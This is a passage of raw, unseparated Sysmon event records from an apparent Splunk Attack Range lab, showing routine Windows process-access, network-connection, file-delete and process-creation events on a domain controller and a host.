10341000x800000000000000079502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.435{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC12-607E-400E-00000000BB01}6924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.435{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC12-607E-400E-00000000BB01}6924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.294{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EC12-607E-3F0E-00000000BB01}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.248{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC12-607E-3F0E-00000000BB01}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.248{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC12-607E-3F0E-00000000BB01}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.069{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000079496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.068{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000079495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.068{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.068{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.068{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.068{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.068{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.068{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.068{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.068{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.068{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050536Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:24.547{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64809-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050535Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:26.825{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA53767037B9FC8936F17B4768EA7510,SHA256=F109877A167A6F3D3071CCF1D43E9C0709EB6A7699283FD6BCD159E9195A608C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050534Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:26.372{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B994815D6C22ACB1C5EA78BFFBC375B0,SHA256=6EB0442690DA49CC0015B3E59BBA35328FDAEE22AA61C9DA97B8ABC6D6D09689,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.888{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.716{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC13-607E-450E-00000000BB01}3376C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.701{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.701{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.701{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.701{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.701{A7A01FEF-B624-607E-0A00-00000000BB01}8524336C:\Windows\system32\services.exe{A7A01FEF-EC13-607E-450E-00000000BB01}3376C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000079696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.712{A7A01FEF-EC13-607E-450E-00000000BB01}3376C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe1.0.0.0MicrosoftSearchInBingMicrosoftSearchInBing-MicrosoftSearchInBing.exe"C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=3F3B0223CBA01746962CCD3C18C39F9B,SHA256=77B990CB81CF51BF1BA80BBA23EF5F5161309F74418BAC8A3AE930EB85EF5374,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x800000000000000079695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.701{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50925376C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+4c224|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+4dd30|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+584fe|C:\Program Files\Common 